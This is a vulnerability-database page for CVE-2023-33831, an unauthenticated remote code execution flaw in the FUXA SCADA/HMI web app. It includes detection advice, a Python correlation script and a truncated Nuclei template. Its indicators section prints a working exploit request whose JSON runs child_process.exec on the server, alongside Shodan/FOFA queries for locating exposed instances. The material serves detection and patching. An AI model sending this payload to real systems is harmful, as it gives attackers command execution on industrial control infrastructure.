CVE-2023-33831
published 2023-09-18
Priority: P187 · critical · 9.8 CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 13.75% (96.0th percentile)
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| frangoteam | fuxa | — | — |
| frangoteam | fuxa | 0 – 1.1.13 | — |
Detection & IOCs
command:
POST /api/runscript HTTP/1.1
Content-Type: application/json
{"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{filename}}')"}}}}
version: FUXA 1.1.13
- Detect exploitation attempts by monitoring for POST requests to /api/runscript containing 'child_process' or 'exec' in the JSON body — these indicate Node.js RCE abuse of the unauthenticated runscript endpoint.
- Match HTTP response body for 'Script OK:' on POST /api/runscript responses as a confirmation of successful script execution by the vulnerable endpoint.
- Detect successful RCE by monitoring GET requests to /_images/<random_6_char_filename> immediately following a POST to /api/runscript — this is the attacker's output exfiltration pattern used in the PoC.
- Use FOFA/Shodan queries for title='FUXA' or title='fuxa' to identify exposed FUXA instances that may be vulnerable to CVE-2023-33831.
- The exploit requires no authentication; any unauthenticated POST to /api/runscript with a JSON body containing a 'code' field should be treated as a high-severity alert.
- The vulnerable endpoint /api/runscript requires no authentication in FUXA 1.1.13; the 'test': 'true' parameter in the JSON payload is what triggers script execution in the PoC — detection rules should account for this field.
- The EPSS score is 0.93354 (99.814th percentile), indicating this vulnerability is very likely being actively exploited in the wild — prioritize detection and patching accordingly.
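The indicators listed above can be combined into one correlation pass over HTTP transaction records. The following is an added example, not code from this page or from any of its sources; the event record layout (`t`, `src`, `method`, `path`, `body`, `resp`), the 60-second window and the character set assumed for the 6-character file name are all assumptions.

```python
import json
import re

IMG_RE = re.compile(r"^/_images/[A-Za-z0-9]{6}$")  # charset of the 6-char name is assumed

def find_key(obj, key):
    """Yield every value stored under `key` anywhere in decoded JSON."""
    if isinstance(obj, dict):
        yield from (v for k, v in obj.items() if k == key)
        obj = list(obj.values())
    if isinstance(obj, list):
        for item in obj:
            yield from find_key(item, key)

def inspect_post(ev):
    """Return the indicators found in one POST /api/runscript transaction."""
    try:
        doc = json.loads(ev["body"])
    except ValueError:
        return []
    code = [c for c in find_key(doc, "code") if isinstance(c, str)]
    checks = {
        "code_field": bool(code),
        "child_process_or_exec": any("child_process" in c or "exec" in c for c in code),
        "test_true": any(str(v).lower() == "true" for v in find_key(doc, "test")),
        "script_ok_response": "Script OK:" in ev.get("resp", ""),
    }
    return [name for name, hit in checks.items() if hit]

def detect(events, window=60):
    """Alert on runscript POSTs; flag a same-source GET /_images/<6 chars> within `window` s."""
    alerts = []
    for ev in events:
        hits = inspect_post(ev) if (ev["method"], ev["path"]) == ("POST", "/api/runscript") else []
        if not hits:
            continue
        if any(o["method"] == "GET" and o["src"] == ev["src"] and IMG_RE.match(o["path"])
               and 0 <= o["t"] - ev["t"] <= window for o in events):
            hits.append("image_fetch_followup")
        alerts.append({"src": ev["src"], "t": ev["t"], "indicators": hits})
    return alerts

# Constructed sample transactions (not real traffic); addresses are documentation ranges.
_BODY = json.dumps({"params": {"script": {"test": "true", "code": "require('child_process').exec('id')"}}})
SAMPLE = [
    {"t": 100, "src": "198.51.100.7", "method": "POST", "path": "/api/runscript", "body": _BODY, "resp": "Script OK: ok"},
    {"t": 102, "src": "198.51.100.7", "method": "GET", "path": "/_images/abcdef", "body": "", "resp": ""},
    {"t": 400, "src": "192.0.2.10", "method": "POST", "path": "/api/runscript", "body": "not json", "resp": ""}]
```

An alert carrying only `code_field` still warrants triage on FUXA 1.1.13, since the endpoint requires no authentication; the additional indicators raise confidence that a script actually ran.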
CVSS provenance
nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck · 9.8 CRITICAL
GHSA
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA
ghsa·2023-09-18
CVE-2023-33831 [CRITICAL] CWE-77 A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
OSV
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA
osv·2023-09-18
CVE-2023-33831 [CRITICAL] A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
VulnCheck
frangoteam fuxa Improper Neutralization of Special Elements used in a Command ('Command Injection')
vulncheck·2023·CVSS 9.8
CVE-2023-33831 [CRITICAL] frangoteam fuxa Improper Neutralization of Special Elements used in a Command ('Command Injection')
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
Affected: frangoteam fuxa
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-16&host_type=src&vulnerability=cve-2023-33831; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-04&host_type=src&vulnerability=cve-2023-33831; https://dashboard.shadowserver.org/statistics/honeypot/
No detection rules found.
Nuclei
FUXA - Unauthenticated Remote Code Execution
nuclei·CVSS 9.8
CVE-2023-33831 [CRITICAL] FUXA - Unauthenticated Remote Code Execution
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
Template:
```yaml
id: CVE-2023-33831
info:
  name: FUXA - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  description: |
    A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
  impact: |
    Unauthenticated attackers can execute arbitrary Node.js code through the runscript API endpoint, potentially compromising the entire SCADA/HMI system and accessing industrial control data.
  remediation: |
    Update FUXA to a version newer than 1.1.13 that validates script co
```